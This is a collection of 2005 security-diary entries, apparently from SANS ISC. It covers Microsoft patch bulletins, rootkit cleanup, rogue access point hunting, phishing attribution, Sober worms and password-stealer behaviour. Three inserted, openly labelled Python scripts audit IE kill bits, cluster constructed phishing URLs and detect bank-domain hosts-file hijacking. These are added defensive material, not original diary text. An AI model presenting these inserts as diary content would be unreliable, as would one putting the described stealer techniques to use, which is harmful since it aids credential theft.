"By default, the "Enable Folder View for FTP Sites" Internet Explorer setting is disabled on all affected operating system versions. An attacker would only be successful if the user manually enables the "Enable Folder View for FTP Sites" Internet Explorer setting on the affected system." This is clearly misleading!
And in the "Workarounds for FTP Client Vulnerability - CAN-2005-2126:" section they only say "Do not download files from un-trusted FTP servers" when they should ADD;
"YOU CAN DISABLE FTP FOLDER VIEW;
To disable FTP Folders, follow these steps:
1. Click Start, point to Settings, click Control Panel, and then double-click Internet Options.
2. Click the Advanced tab.
3. Under Browsing, to disable FTP Folders, CLEAR/UNCHECK the Use Web Based FTP or Enable Folder View for FTP sites check box.
NOTE: When you CLEAR/UNCHECK the Use Web Based FTP or Enable Folder View for FTP sites check box, you are disabling FTP Folder functionality.
So let me try and work something up on that end and see if I can get it into the diary.
No option to install Web Folders when you install Internet Explorer 6
Article ID : 298637
Last Review : June 20, 2005
Revision : 5.0
How to Install and Use FTP Folders
Article ID : 217888
Last Review : September 28, 2004
Revision : 3.1
MS05-051 exploit info and rumors
In addition we're seeing reports of non-specific exploit warnings from managed security service providers to their customers. And some rumors.
McAfee Vulnerability Information says that they have protection against exploits of MS Vulnerability MS05-051, "Entercept's Generic Buffer Overflow Protection protects against code execution that may result from exploiting this vulnerability."
ISS says they have protection out for an exploit, it's announcement is here.
NFR says they have protection out for an exploit. their announcement is here.
Here are some pre-announcement facts: see the DShield data on port 3372 scanning, YMMV.
We'll post anything else that's specific and critical when we get it.
24 BEA WebLogic Vulnerabilities and Security Issues
Belated "deja vu" - IR for rootkits that run in safe mode
Since I then knew of only 2 Haxdoor versions which create the SAFEMODE cleaning issue (flattening is still preferred here), and since this cleaning issue doesn't seem to have created any significant AV vendor issues in the middle of this year's malware fe$tival, I dropped a line to some AV acquaintances about the IR problems these two variants create.
To make a long story short, F-Secure took a look at the second "safe mode" variant and said "Yes, this variant uses the similar registry keys/values. Haxdoor indeed does run in safemode. Symantec's recommendation about recovery console is probably the easiest way to delete haxdoor without any special tools. F-Secure BlackLight also can identify and rename haxdoor's files. So I'd recommend users to try that first. It is far easier to use than recovery console."
And if your AV vendor does or does not address this issue, please drop me a line. Thanks!
Also, thanks very much Lorna, Tom and Jarkko!
F-Secure BlackLight Beta
Symantec Backdoor.Haxdoor.E, "Discovered on: August 01, 2005"
Tom's analysis mentioning the second variant is in the Handler's Diary September 22nd 2005, see Follow the Bouncing Malware IX: eGOLDFINGER
Autoruns updated October 6th
The previous registry value length problem was covered by Handler Daniel Wesemann, with many reader contributions, in Nasty Games of Hide and Seek in the Registry
VERITAS NetBackup Vulnerability - remote
"The vulnerable daemon listens on port 13722 on both NetBackup servers and clients."
NetBackup 4.5, all versions, all platforms.
NetBackup 5.0, all versions, all platforms.
NetBackup 5.1, all versions, all platforms.
NetBackup 6.0, all versions, all platforms.
Their suggested workaround:
Block external network access on TCP port 13722
Symantec's version of the vulnerability announcement - VERITAS NetBackup: Java User-Interface, format string vulnerability
Black Tuesday Summary
| Bulletin | Replaces | Severity | Impact |
| MS05-045 | N/A | Moderate | Denial of Service |
| MS05-046 | N/A | Important | Remote Code Execution |
| MS05-047 | MS05-039 | Important | Remote Code Execution and Local Elevation of Privilege |
| MS05-048 | N/A | Important | Remote Code Execution |
| MS05-049 | MS05-016, MS05-024 | Important | Remote Code Execution |
| MS05-050 | MS05-030 | Critical | Remote Code Execution |
| MS05-051 | MS05-010, MS05-026, MS05-039, MS05-012, MS04-012 | Critical | Remote Code Execution |
| MS05-052 | MS05-037, MS05-038 | Critical | Remote Code Execution |
MS05-049 Windows Shell Vulnerability
Impact: Remote Code Execution
Supercedes: MS05-016 and MS05-024
This bulletin has three Parts to it.
Shell Vulnerability - CAN-2005-2122: A vulnerability exists in the way that Windows handles the .lnk file extension. A .lnk file is a shortcut which points to another file and can contain properties that are passed on to the file it points to. An attacker taking advantage of this would be able to execute code on the victim's system by getting the victim to open the .lnk file.
Shell Vulnerability - CAN-2005-2118: Same as above, except that instead of opening the .lnk file, the victim only needs to view the properties of the .lnk file.
Web View Script Injection Vulnerability - CAN-2005-2117: This vulnerability concerns the Web View format used by Windows Explorer to display files and their information. A vulnerability exists in the way that Windows validates HTML characters within certain fields of the files. An attacker taking advantage of this would be able to take complete control of the victim's system if the victim views the malicious file with Web View turned on in Explorer.
MS05-046 Client Service for NetWare Vulnerability
The update "resolves a newly-discovered, privately-reported vulnerability", MS rates it Important, and MS says update at your "earliest opportunity".
I rate it "Critical", test and deploy this update ASAP. One reason is that Microsoft notes "CSNW is commonly associated with the Internetwork Packet Exchange (IPX) and Sequenced Packet Exchange (SPX) protocols. However, CSNW could be exploited by using any installed protocol".
In the MS list of workarounds, one reasonable workaround is "Block TCP ports 139 and 445 at the firewall" and "use a personal firewall". An unreasonable workaround is that MS says you can remove CSNW.
CVE CAN-2005-1985 is "(under review)" and "Reserved" so far.
NOT AFFECTED - Microsoft Windows XP Professional x64 Edition, Windows Server 2003 for Itanium-based Systems, Windows Server 2003 with SP1 for Itanium-based Systems, Windows Server 2003 x64 Edition, Windows 98, Windows 98 Second Edition (SE), and Windows Millennium Edition (ME).
MS05-044 Windows FTP Client File Transfer Location Tampering
MS05-044 Vulnerability in the Windows FTP Client Could Allow File Transfer Location Tampering
This bulletin and related patch resolve a newly discovered public vulnerability. The flaw exists in the Windows FTP Client on Windows 2000 SP4 (with IE 6 SP1), XP SP1 and Windows Server 2003 computers. An attacker can exploit the flaw to tamper with the file transfer location on the client during an FTP file transfer session. When a client user on an affected system has manually chosen to transfer a file via FTP, the attacker can redirect the storage location to a location such as the Startup folder. In general, if you do not download files from untrusted FTP (or any other) servers then you really won't have a problem. Unfortunately, most end users are too trusting of links on the web and in email and can be exploited in a few situations.
Per Microsoft, the vulnerability is mitigated in 3 ways.
1) "The attacker would have to successfully persuade end users to visit an FTP server hosting files with specially-crafted file names" and would have no way of forcing the files to be transferred. This would require our end users to interact with dialog boxes and click on links without concern.
2) If a file of the same name already exists in the alternate location, then an "Overwrite File" warning message will be presented. If end users click through the dialog box, then it will go ahead and overwrite the file.
3) The attack is only successful if the Internet Explorer setting "Enable Folder View for FTP Sites" has been changed from its default disabled state.
MS05-051 Vulnerabilities in MSDTC and COM+
MS05-051-A: MSDTC Vulnerability
MSDTC stands for "Microsoft Distributed Transaction Coordinator". This facility allows programmers to combine updates sent to several programs or systems into a "transaction", which ensures consistency across several applications.
This vulnerability is particularly serious for Windows 2000. In the case of Windows 2000, a remote user may trigger the vulnerability without having to log in. For Windows 2k3 and XP, a user would have to log in first.
Either way, an exploit for this vulnerability would provide full system access. One of the other non-system vulnerabilities could leverage the MSDTC problem to gain full system access.
As a quick workaround, you should disable the network access to DTC. See
this MSDN Article for details. Even if you patch, you should still disable remote access to DTC if you don't need it.
Quick notes to disable DTC:
sc stop MSDTC & sc config MSDTC start= disabled
eEye discovered the vulnerability and provided a cookbook for writing an exploit as part of its advisory. It shouldn't take too long to see this exploited.
Additional information about this vulnerability has been published by iDefense, available at http://www.idefense.com/application/poi/display?id=319
MS05-051-B: COM+ Vulnerability
COM+ is used to allocate resources to applications. By keeping, for example, connection pools and allocating connections as needed to processes, programs run faster because they do not have to initiate a new connection each time.
On Win2k and XP-SP1, an attacker can use this vulnerability to remotely obtain administrator privileges without having to authenticate. On XP-SP2 and Win2k3, this vulnerability can only be used to escalate privileges of a local authenticated user.
Standard firewalling procedures (UDP 135,137,138,445 and TCP 135,139,445,593) can help mitigate the vulnerability. However, if you have COM Internet services enabled, or RPC over HTTP, you will also have to firewall port 80 and 443.
Patching this vulnerability is critical for Win2k users. XP-SP1 users should patch and update to SP2 if possible. You may also want to consider disabling DCOM in addition to patching. See the MSFT bulletin for details.
MS05-051-C: TIP Vulnerability and Distributed TIP Vulnerability
CVE: CAN-2005-1979, CAN-2005-1980
The Transaction Internet Protocol ('TIP') is used by MSDTC (see MS05-051-A) to interface with other transaction managers. The particular vulnerability discussed here is a denial of service vulnerability which will cause TIP to cease responding if a specially crafted message is received.
Additional information about this vulnerability has been published by iDefense, available at http://www.idefense.com/application/poi/display?id=320
MS05-045: Network Connection Manager DoS
The Network Connection Manager is used to manage different network connections (e.g. LAN, dialup ...). A specially crafted packet sent to a connection can cause the Network Connection Manager to die. However, it will restart once a new request is received.
Not much of a vulnerability. Requires an already authenticated (=connected) user and impact appears to be minimal. The latest versions of Windows are not vulnerable (XP-SP2, Win2k3 SP1). However, older and still popular versions are (like XP-SP1, Win2k3 pre-SP1, Win2k).
Firewall best practices can be used to mitigate the issue.
MS05-047 Vulnerability in PnP Could Allow Remote Code Execution
This patch addresses a remote code execution and local elevation of privilege vulnerability in Plug and Play. It is similar to the one addressed by MS05-039, but exploiting it requires the attacker to have valid logon credentials. For Windows 2000 systems that have not been patched for MS05-039, this issue can still be exploited remotely by anonymous users. On Windows XP SP2, the attacker must be able to log on locally in addition to having valid logon credentials. This patch replaces MS05-039, which was released in August and was exploited by the Zotob worm.
The standard practice of blocking ports 139 and 445 TCP will help slow exploitation of this. Just remember that the road warriors who are connected to less firewalled locations can potentially bring any such activity inside your organization.
Microsoft rates this vulnerability as Important severity, as it does require valid logon credentials to attack a host. Knowing that many corporations and academic organizations use a common password for the local administrator or other accounts on desktop computers, it is not inconceivable to me that this could be more critical than it looks at first. Any passwords that were compromised with MS05-039 (or any other patches in the past year) could be used to satisfy the need for local credentials on 2000 and XP systems prior to exploitation. If all compromises of hosts in the past year or so resulted in all related passwords across the domain being changed, then this will be a mostly non-event. If old passwords are still in use, then botnets or other malware will widely exploit this one in due time.
MS05-050 Vulnerability in DirectShow
DirectShow is part of DirectX. This component is used to display audio and video streams. DirectX is able to do so very fast and efficiently by taking advantage of hardware-specific acceleration.
In order to trigger this vulnerability, a user has to open a malicious .avi video file. If opened, the file may execute arbitrary code. This vulnerability is not able to escalate privileges by itself, so any damage will be limited to files the user running DirectShow has access to.
Malicious .avi files would likely be delivered as an instant message link, a URL on a web site or they may be attached to an e-mail message.
Standard "safe computing" practices will help mitigate this vulnerability. For example, do not log in as "Administrator" for day to day work and avoid accessing untrusted web sites. However, these steps are not perfect and patching is highly recommended.
In some cases, in particular on servers, you may be able to do without DirectX. Let us know if you have a recipe on how to disable DirectX.
MS05-048 CDO Object Remote Code Execution
KB: Win2K SP4 - KB901017, WinXP SP1/SP2 - KB901017, Win2K3 - KB901017
Collaboration Data Objects (CDO) allow Windows systems to send email through SMTP or a Microsoft Exchange server. An unchecked buffer in the CDO functions for Windows 2000 and later systems (CDOSYS) and in Microsoft Exchange servers (CDOEX) allows an attacker to compromise the target host. In order to trigger this vulnerability, an attacker has to deliver a specially-crafted mail message via SMTP which is processed by the event sink handling subsystem, designed for granular processing of CDO messages.
The mitigating circumstance for this vulnerability is that the IIS 5.0 and Exchange 2000 SMTP services do not use event sinks by default. The IIS 6.0 SMTP service does use event sinks and is therefore vulnerable, but IIS 6 does not install the SMTP service by default. There is some confusion in the Microsoft bulletin about Exchange 2003, as it is listed both as "not vulnerable" and in the "affected software" section of the bulletin.
Determining whether your IIS SMTP service or Exchange 2000 system is vulnerable depends on whether you are using event sinks on your system. Third-party software such as spam gateways or anti-virus systems may install event sinks to process email messages, making systems running these products vulnerable to this flaw.
The workaround is to disable event sinks, which may not be an option for your third-party AV or spam filtering software. Customers should apply the patches to resolve this flaw at the earliest opportunity.
MS05-052 Cumulative Security Update for Internet Explorer (896688)
Once again, watch out on this one, because part of this cumulative update does nothing more than set "the kill bit for the affected Class Identifiers (CLSID) in these COM objects." And it's a growing list of kill bits MS is setting.
In your environment, if you cannot accept setting the kill bits involved in this "Cumulative" update, then you are effectively prevented from receiving other portions of the update, including "improvements to the Internet Explorer Pop-up Blocker" and "improvements to the Internet Explorer Add-on Manager." MS also mentions that the "Cumulative" Security Update "includes a kill bit for the ADODB.Stream object. This kill bit was released previously, but not as part of a security update. For more information about the ADODB.Stream object, see Microsoft Knowledge Base Article 870669. The Class Identifier (CLSID) for this object is 00000566-0000-0010-8000-00AA006D2EA4."
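One way to audit which kill bits are actually present on a system, as an added example that is not part of this diary entry or of Microsoft's bulletin: the kill bit is bit 0x400 of the "Compatibility Flags" DWORD under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} (Microsoft KB 240797). The script below parses a .reg export of that key (so it can run offline, for example against a file exported from a reference build) and reports the CLSIDs whose kill bit is set; the export embedded in it is constructed, and only the ADODB.Stream CLSID quoted above is a real identifier. The live check at the end uses winreg and therefore only works on Windows; on 64-bit Windows the 32-bit view under Wow6432Node would also need checking, which the example does not do.

```python
"""Report which ActiveX CLSIDs have the IE kill bit set, from a .reg export.

Added example, not from the ISC diary or the MS05-052 bulletin. The kill bit
is 0x400 in "Compatibility Flags" under the ActiveX Compatibility key.
"""
import re

KILL_BIT = 0x400
ADODB_STREAM = "{00000566-0000-0010-8000-00AA006D2EA4}"   # real CLSID, from the bulletin
COMPAT_SUBKEY = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
COMPAT_KEY = "HKEY_LOCAL_MACHINE\\" + COMPAT_SUBKEY

# Constructed .reg export (the format "reg export" / regedit produce).
# The two 1111.../2222... CLSIDs are made-up placeholders.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{11111111-2222-3333-4444-555555555555}]
"Compatibility Flags"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{22222222-2222-3333-4444-555555555555}]
"Compatibility Flags"=dword:00000401
"""

KEY_RE = re.compile(r"^\[(.+)\]\s*$")
FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9a-fA-F]{1,8})\s*$')


def parse_compat_flags(reg_text):
    """Map CLSID -> Compatibility Flags for every subkey of the ActiveX Compatibility key."""
    flags, current = {}, None
    prefix = (COMPAT_KEY + "\\").upper()
    for line in reg_text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            # Only subkeys of the compatibility key carry kill bits; ignore anything else.
            current = key[len(prefix):].upper() if key.upper().startswith(prefix) else None
            continue
        m = FLAGS_RE.match(line)
        if m and current:
            flags[current] = int(m.group(1), 16)
    return flags


def killbit_set(flags_by_clsid, clsid):
    """True if the kill bit (0x400) is set for clsid; other flag bits are ignored."""
    return bool(flags_by_clsid.get(clsid.upper(), 0) & KILL_BIT)


def killed_clsids(reg_text):
    """Sorted list of CLSIDs in the export whose kill bit is set."""
    return sorted(c for c, f in parse_compat_flags(reg_text).items() if f & KILL_BIT)


def live_killbit(clsid):
    """Read the flag from the live registry (Windows only; winreg is missing elsewhere)."""
    import winreg
    path = COMPAT_SUBKEY + "\\" + clsid
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            value, _ = winreg.QueryValueEx(key, "Compatibility Flags")
    except FileNotFoundError:
        return False        # no entry at all means no kill bit
    return bool(value & KILL_BIT)


if __name__ == "__main__":
    for clsid in killed_clsids(SAMPLE_REG):
        print("kill bit set:", clsid)
```

A CLSID can carry other compatibility flags (the constructed 0x401 entry above), so test the bit rather than comparing the whole value to 0x400.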
Previous commentary on kill bits - Open letter from the handlers
• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)
A portion of this "Cumulative" update replaces MS05-037 and MS05-038.
SSL 2.0 Rollback in OpenSSL
This can be solved by either disabling SSL 2.0 entirely on either endpoint, or by upgrading the server software to one of the new OpenSSL versions.
For more information, see: http://www.openssl.org/news/secadv_20051011.txt
CA iGateway debug mode HTTP GET request buffer overflow vulnerability/exploit
Large botnet in the Netherlands taken down
A large botnet in the Netherlands, with over 100k infected hosts, was taken down 3 days ago by a cooperative effort of several CERTs. The National High Tech Crime Centre (NHTCC), GOVCERT.NL, and the Computer Emergency Response Team of the Dutch government worked together to take down this W32.Toxbot-driven network.
For more information.....
User questions new WindowsUpdate Fix
For which Microsoft then submitted
So, today being a somewhat slow day, we were wondering if there are any readers who had problems with WindowsUpdate, and subsequently applied the listed patch? What were the results?
Happy turkey day
What I'm reading today
Jim Clausing, jclausing /at/ isc.sans.org, also see http://handlers.sans.org/jclausing/
DHCP OS Fingerprinting
Jim Clausing, jclausing /at/ isc.sans.org
More on hunting rogue access points
Jim Clausing, jclausing/at/isc.sans.org and http://handlers.sans.org/jclausing/
I haven't answered that question yet, there are still a number of theories, and very little evidence to sort. But I have made some progress in addressing the "who is attacking us?" question.
First, there is the bait-message. This is the email that is sent out with the hopes of finding appropriate targets. Each of these can be investigated as a spam campaign. They have their spam relays, they have their target list, they have their subset of subject messages, and they may or may not have a permutation of body.
I think it's possible that the people managing the spam campaign are separate from those managing the actual phishing attack. It's possible that separate phishing groups could employ a single spamming outfit. That's just a theory at the moment.
Secondly, there is the hook-site. This is where the link in the bait-message initially takes the victim. The hook-site may also be the collection-site, but it could forward the victim on to a separate collection server. This technique is especially common in cases where a phisher has a network of collection sites.
Use of a network of sites is an identifying quality of a phisher. I argue that given a set of phishing attacks, one can partition them to identify certain habits or modus operandi of the criminal actor. This actor may be an individual or a group.
There are two main ways that I use to build these partitions or clusters. You can compare how the hook-site or collection-site is built. By collecting copies of the phishing sites during your investigation and keeping them on hand, an investigator can go back and identify "repeat offenders." By comparing the fake website, to the target-firm's original site, you can examine any changes that the criminal applied. You could also approximately date when the site was copied—if you have a suitable change-control process on your web content.
Clusters and habits can also be detected in the URL used for the hook-site. How the criminal compromises, purchases, or otherwise acquires the hosting space can be evident in this URL. Are they creating suspiciously long domain names (implying they control the DNS), or are they using dotted directories in an attempt to hide the space from visual detection? Are the sites hosted off of cgi-bin space, or in directories of a BBS application? All of these qualities can be used to cluster a number of attacks into a smaller set of attackers.
Clustering along where a hook- or collection- site is hosted can sometimes illuminate a pattern; I did not find this to be the case in this population of URLs. I did find some interesting correspondences in the registrar used for some of the domains. This appeared to be indicative of an issue in the registrar's validation policies.
In an attempt to automate the detection and classification, I wrote some routines that calculate the "lexical distances" between the URLs used in the attacks. Then we built clusters based on arbitrary thresholds on these distances to see if the system was any better at classifying similar attacks than the humans. Needless to say, the trained human analyst will outperform my pathetic Perl script any day of the week, but they did find it helpful. Which is what it's all about.
Sadly, identifying clusters and forming a behavioral fingerprint of a criminal is a long way from identifying said criminal.
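The two partitioning approaches described above (structural habits in the URL, and lexical distance with a threshold), as an added example in Python that is not the handler's own Perl script. All URLs in it are constructed (RFC 5737 test addresses and .test names), not real phishing sites; the habit checks, the digit-collapsing normalisation, the relative Levenshtein distance and the 0.2 threshold are my choices for illustration, not values taken from the diary.

```python
"""Partition phishing hook-site URLs by hosting habits and lexical distance.

Added example, not the ISC handler's code. Every URL below is constructed.
"""
import re
from urllib.parse import urlsplit

SAMPLE_URLS = [  # constructed; none of these are real sites
    "http://secure-login-update-account-verification.example.test/cgi-bin/login.php",
    "http://secure-login-update-account-confirm.example.test/cgi-bin/login.php",
    "http://203.0.113.7/.bank/signin/index.htm",
    "http://203.0.113.9/.bank/signin/index.htm",
    "http://forum.example.test/phpBB2/images/bank/login.htm",
]

IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def habits(url):
    """Qualities of a URL that hint at how the hosting space was acquired."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    segments = [s for s in parts.path.split("/") if s]
    is_ip = IP_RE.fullmatch(host) is not None
    return {
        "ip_host": is_ip,
        "long_domain": len(host) >= 40 and not is_ip,     # attacker-controlled DNS?
        "dotted_dir": any(s.startswith(".") for s in segments),   # hidden directory
        "cgi_bin": "cgi-bin" in segments,
        "bbs_app": any(re.fullmatch(r"phpbb2?|vbulletin|forum", s, re.I) for s in segments),
    }


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def canonical(url):
    """host+path, lowercased, digit runs collapsed so 203.0.113.7 and 203.0.113.9 look alike."""
    p = urlsplit(url)
    return re.sub(r"\d+", "0", ((p.hostname or "") + p.path).lower())


def distance(u, v):
    """Edit distance relative to the longer canonical form (0.0 = identical shape)."""
    a, b = canonical(u), canonical(v)
    return levenshtein(a, b) / max(len(a), len(b), 1)


def cluster(urls, threshold=0.2):
    """Single-linkage clustering: a URL joins a cluster if it is within threshold of any member."""
    parent = list(range(len(urls)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i in range(len(urls)):
        for j in range(i + 1, len(urls)):
            if distance(urls[i], urls[j]) <= threshold:
                parent[find(i)] = find(j)
    groups = {}
    for i, u in enumerate(urls):
        groups.setdefault(find(i), []).append(u)
    return sorted(groups.values(), key=len, reverse=True)


if __name__ == "__main__":
    for group in cluster(SAMPLE_URLS):
        print(len(group), "URL(s), habits of first:",
              [k for k, v in habits(group[0]).items() if v])
        for u in group:
            print("   ", u)
```

The threshold is deliberately a parameter: as the text says, it is arbitrary, and the analyst tunes it against hand-labelled attacks. Collapsing digits before measuring distance is what lets two hook-sites on adjacent IP addresses fall into one cluster while a long registered domain stays separate.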
kliston -AT- isc sans org
Adventures in Hunting Rogue Wireless Access Points
This week I had the opportunity to hunt down some rogue WAPs at a client's campus. It was a very target-rich environment. Out of the 62 talkers that I spotted on the hunt, 39 were not part of the main, accepted infrastructure. Out of these 39, we were looking for only one. Not quite a needle-in-a-haystack problem, but more like a something-under-a-desk-in-a-sea-of-cubicles problem.
The Playing Field
The search area consisted of an extremely large low-rise facility with cubicles reminiscent of poultry factory farming.
Myself, with my trusty combat-laptop running Debian and Kismet 2005.04.R1 with an Orinoco Gold PCMCIA card, and an external directional antenna.
The engineer who designed the wireless infrastructure with his Windows XP laptop, Cisco Aironet card, and AiroPeek from WildPackets.
Well, it was more of a team effort.
Based on the results that we were seeing from the Engineer's WLSE (http://www.cisco.com/en/US/products/sw/cscowork/ps3915/) interface we knew that two of his WAPs could see the target, and we knew approximately where these WAPs were installed.
He went with the back-pack, carry-the-laptop-around method, while I appropriated a cart to wheel around.
We went down to the area and wandering ensued. Eventually, Kismet detected the beacon packets. The best way to use Kismet in hunting a single WAP is to bring up the details (the 'i' key in this version) and keep an eye on the power rating. The 14 dBi gain antenna wasn't as much use in the environment as I had hoped it would be. It did help in determining if we were on the right floor, and which WAP it was most likely close to. It got us into the general area. Eventually you get too close to the transmitter for the antenna to be helpful.
Attenuation is Your Friend
As you get closer to the transmitter, the signal is hot enough that you can't see the subtle changes in intensity to help guide you in the correct direction efficiently. You need to "knock the signal down" a bit so that it fits better on your meter, so that you can read the changes.
My first step was to disconnect the directional antenna. In what turned out to be good luck, the only cart available to me was a high-walled metal cart used to transport hanging files. This held my laptop and its PCMCIA card in the bottom of a metal box, so it was shielded from the signal rather well.
Once I was in the right area, I would effectively worm my way around the cubes until I spotted the blinky box that we were after.
My initial plan to solve the rogue access point problem was to buy some prizes and have a few "Fox and Hound" contests on the weekend where some of the appropriately-minded employees could "compete." I still like that plan, but any time that you have people looking through cubes, you have to operate in teams so they can both keep-an-eye-on and vouch-for each other.
For more information on general transmitter hunting, I recommend Moell and Curlee's Transmitter Hunting: Radio Direction Finding Simplified. Although their focus is on a different frequency range, the general concepts apply.
kliston -AT- isc sans org
Request for packets 50032
If you have only logs, please submit them directly to dshield.org for processing. It is the packets that we are interested in.
kliston -AT- isc sans org
Bluetooth Followup Links
I failed to provide a link to btscanner by Pentest in the UK. I did not use it in my tests, but I've heard good things about it.
Other interesting links that were sent to me:
and something interesting from Slashdot:
kliston -AT- isc sans org
Tenable announced yesterday that Nessus 3 will be closed-source: http://news.com.com/Nessus+security+tool+closes+its+source/2100-7344_3-5890093.html?tag=nefd.hed
Checkpoint announced the purchase of Sourcefire, but promises to keep Snort open-source: http://www.checkpoint.com/sourcefire/index.html
kliston -AT- isc sans org
Microsoft October Security Bulletin Advanced Notification
I can't wait.
kliston -AT- isc sans org
Battle of the ISP's
According to Hardware Geeks, this is preventing web pages hosted on one ISP from being accessed by the other's customers.
It looks like these "boys" need a timeout. Go to opposite corners and take a deep breath. (Isn't that what we tell the children when they start fighting.)
It will definitely be interesting to watch this one play out.
Two New Sober Viruses on the Loose Today
It never fails: somehow it seems that whenever I am to be the Handler On Duty we have another little Smurf pop out of the closet. Today's little Smurf is Sober.R or Sober.Q or Worm_Sober.AC or ...., well, you get the drift. (What's in a name anyway?) However, I am pleased to say that the official CME has been released for this little fella. Nothing to report there yet; it says Not Currently Available. You'll have to keep checking back to see what the update brings.
We do however believe that we are working with at least two different versions.
FSecure has an interesting write up on this and is calling the second one a Dropper. Take a look at the info in F-Secures writeup.
Our malware team is looking at the code as we speak. It appears that this one is picky about who is blessed to receive a copy. It appears to be a self-mailer. Our malware team is hard at work attempting to identify and evaluate this thing and will update us as soon as possible.
It looks like the attachment name may have changed as well. The one that I just received had the attachment name
and appears to be according to the subject my "Registration Confirmation".
The program is packed with some pretty nasty stuff. It looks like it may scan the hard drive to see what additional mischief it can create. It appears to create a file services.exe and sets itself up to run in the registry.
We will keep you updated on any additional info that we get on this.
Sober Virus (CME-151)
This variant uses different email messages randomly in either German or English. We have received several reports from our readers. One reader submitted to us with the email message as below:
Danke für Ihre Mail ....
Sie haben aber Ihre Mail wahrscheinlich falsch adressiert,,, nämlich an mich. Ich kenne sie aber nicht!
Oder Ihr Provider hat die Mail falsch weiter geleitet!?
Um mich zu entlasten, schicke ich Ihnen das (...) Foto wieder zurück.
(In English: Thanks for your mail .... But you probably addressed your mail wrongly,,, namely to me. I don't know you, though! Or your provider forwarded the mail incorrectly!? To clear myself, I am sending the (...) photo back to you.)
This virus arrives with one of the following attachment names:
Inside the ZIP archive is a file named PW_Klass.Pic.packed-bitmap.exe.
You can check out more details from various antivirus vendors website:
Pwstealers - evolution
While reading Mike's great story from yesterday's diary I thought about posting this little story about my observations of Password Stealers, also known as PWstealers.
I have been watching this kind of malware for some time. I don't have exact numbers, but I am pretty sure that Brazil is one of the most targeted countries for this kind of scam...
I currently can distinguish four kinds of the pwstealers:
- The keyloggers/screenloggers
- The fake bank windows
- Fake Bank webservers
- The downloaders
The keyloggers/screenloggers detect the bank URLs, then try to capture as much of the available information as they can and send it to an email address. I once found a compromised machine that was hosting hundreds of directories, one per victim machine, and inside each one hundreds of small images of the user clicking, used to find his/her passwords...
The fake bank windows kind is a funny one... whenever it detects the bank URLs, it calls IE with a fake website of the bank you typed. :) The funny thing was that, not rarely, the fake websites were outdated and had some strange graphics... The user was supposed to fill in all the fields, and then the window would close with an (also fake) error message... :)
The fake bank webservers are quite interesting. This malware installs a webserver on the machine and changes the hosts file to redirect a specific bank domain to localhost, which is running the bank homepage, right? :)
The fourth one is quite obvious, and sometimes even I am not sure whether to put it in the same category (pwstealers). But I include it because these downloaders are specific to pwstealers: they usually contact a free hosting site and download a piece of one of the three kinds above...!
Another thing I am observing is that they are changing the way the code is packed... recently they have been changing the kind of packer used to more powerful ones... more difficult to reverse...
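A check for the hosts-file trick used by the third kind above, as an added example that is not the handler's code: parse the Windows hosts file, and flag any entry that maps a watched bank domain to the loopback address (the local fake webserver) or to any other address (a redirect to a remote server). The bank domains and the hosts file contents below are constructed; in practice the watch list is the domains of the institutions your users actually bank with.

```python
"""Flag hosts-file entries that hijack bank domains.

Added example, not from the ISC diary. Watched names and hosts contents are
constructed; 192.0.2.x is an RFC 5737 documentation address.
"""
import ipaddress

WATCHED_SUFFIXES = ("bank.example", "banco.example")   # constructed watch list

SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       www.bank.example
127.0.0.1       bank.example
192.0.2.55      internet.banco.example  # constructed remote redirect
10.1.2.3        intranet.corp.example
"""


def parse_hosts(text):
    """Yield (line number, ip, hostname) for each name in a hosts file, ignoring comments."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop trailing and full-line comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:                        # malformed address column; skip the line
            continue
        for name in fields[1:]:                   # one IP may map several names
            entries.append((lineno, ip, name.lower()))
    return entries


def suspicious_entries(text, watched=WATCHED_SUFFIXES):
    """Entries for watched domains; loopback means a local fake webserver, else a remote redirect."""
    findings = []
    for lineno, ip, name in parse_hosts(text):
        if name == "localhost":
            continue
        if any(name == s or name.endswith("." + s) for s in watched):
            kind = "local fake webserver" if ip.is_loopback else "remote redirect"
            findings.append({"line": lineno, "name": name, "ip": str(ip), "kind": kind})
    return findings


if __name__ == "__main__":
    # On a real system read C:\Windows\System32\drivers\etc\hosts instead of SAMPLE_HOSTS.
    for f in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['name']} -> {f['ip']} ({f['kind']})")
```

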